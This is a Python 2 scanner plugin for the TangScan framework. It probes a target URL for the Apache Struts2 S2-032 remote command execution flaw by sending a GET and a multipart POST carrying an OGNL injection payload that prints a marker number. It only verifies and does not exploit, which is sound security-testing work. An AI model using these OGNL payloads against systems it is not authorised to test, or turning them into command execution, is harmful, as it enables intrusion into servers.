前段时间很火的S2-032 远程命令执行

import re
import string
from StringIO import StringIO
from thirdparty import requests
from modules.exploit import TSExploit
from StringIO import StringIO

class TangScan(TSExploit):
    """S2-032 remote command execution check, built on the ``TSExploit`` base.

    Only ``verify`` is implemented; ``exploit`` is a no-op.  The code is
    Python 2 only (``except Exception, e``, ``print`` statement, ``StringIO``).
    """

    def __init__(self):
        # Plugin metadata, the single "url" option and the result schema are
        # registered through helpers inherited from TSExploit.
        super(self.__class__, self).__init__()
        self.info = {
            "name": "S2-032 远程命令执行",
            "product": "",
            "product_version": "",
            "desc": """
            S2-032 远程命令执行
            """,
            "license": self.license.TS,
            "author": ["系统"],
            "ref": [
                {self.ref.wooyun: "http://zone.wooyun.org/content/26856"},
            ],
            "type": self.type.rce,
            "severity": self.severity.high,
            "privileged": False,
            "disclosure_date": "",
            "create_date": ""
        }
        # The only option: the target url (desc "目标 url"), converted with the
        # framework's url_field converter.
        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": "目标 url"
            }
        })
        # Result defaults: status False until a probe is judged a hit.
        self.register_result({
            "status": False,
            "data": {

            },
            "description": "",
            "error": ""
        })

    def verify(self):
        """Probe ``self.option.url`` and set ``self.result`` on a hit.

        Two probes are sent: a GET carrying the OGNL expression in the query
        string, then (only if that misses) a multipart POST whose prepared
        body is patched to carry the same expression.  Both look for the
        marker ``88888887`` (the evaluated ``88888888-1``) in the response
        body, and a probe counts as a hit only when ``str.find`` returns 0,
        i.e. the marker is the very first thing in the body.  On a hit
        ``result.status`` is set True and ``result.description`` names the
        url; otherwise the result is left untouched.
        """
        exp_url = self.option.url + "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj[0]),%23w.getWriter().println(88888888-1),%23w.getWriter().flush(),%23w.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse"
        try:
            # No timeout on this GET (the POST probe below uses timeout=10).
            r = requests.get(exp_url)
            content = r.content
        except:
            # Bare except: any failure (network error, timeout, ...) is treated
            # as an empty body and falls through to the POST probe.
            content = ''
        if content.find('88888887') == 0:
            self.result.status = True
            self.result.description = "目标 {url} 存在st2命令执行".format(
            url=self.option.url
        )
        else:
            try:
                headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'}
                # "xxoo" is a placeholder form field; it is replaced in the
                # encoded body after prepare() below.
                data = {r'reqobj': 'com.opensymphony.xwork2.dispatcher.HttpServletRequest',"rpsobj":"com.opensymphony.xwork2.dispatcher.HttpServletResponse","xxoo":"1"}
                files = {'test': ('1.jpg', StringIO('1'))}
                req = requests.Request('POST', self.option.url, headers=headers, data=data,files=files).prepare()
                
                req.body = req.body.replace('xxoo', r'method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#w=#context.get(#parameters.rpsobj[0]),#w.getWriter().println(88888888-1),#w.getWriter().flush(),#w.getWriter().close(),1?#xx:#request.toStringj')
                # The body was edited after preparation, so Content-Length is
                # reset to match it (assigned as an int, not a str).
                req.headers['Content-Length'] = len(req.body)
                s = requests.Session()
                # NOTE: TLS certificate verification is disabled and redirects
                # are not followed for this probe.
                reponse = s.send(req, timeout=10, verify=False, allow_redirects=False)

                if reponse.content.find('88888887') == 0:
                    self.result.status = True
                    self.result.description = "目标 {url} 存在st2命令执行".format(
                    url=self.option.url
                )
                
                
            except Exception,e:
                # Python 2 syntax.  Errors from the POST probe are only
                # printed; self.result is not updated.
                print str(e)
    def exploit(self):
        # No exploitation step is implemented; this module only verifies.
        pass

if __name__ == '__main__':
    # Script entry point: hand a fresh plugin instance to the framework runner.
    from modules.main import main as run_plugin
    scanner = TangScan()
    run_plugin(scanner)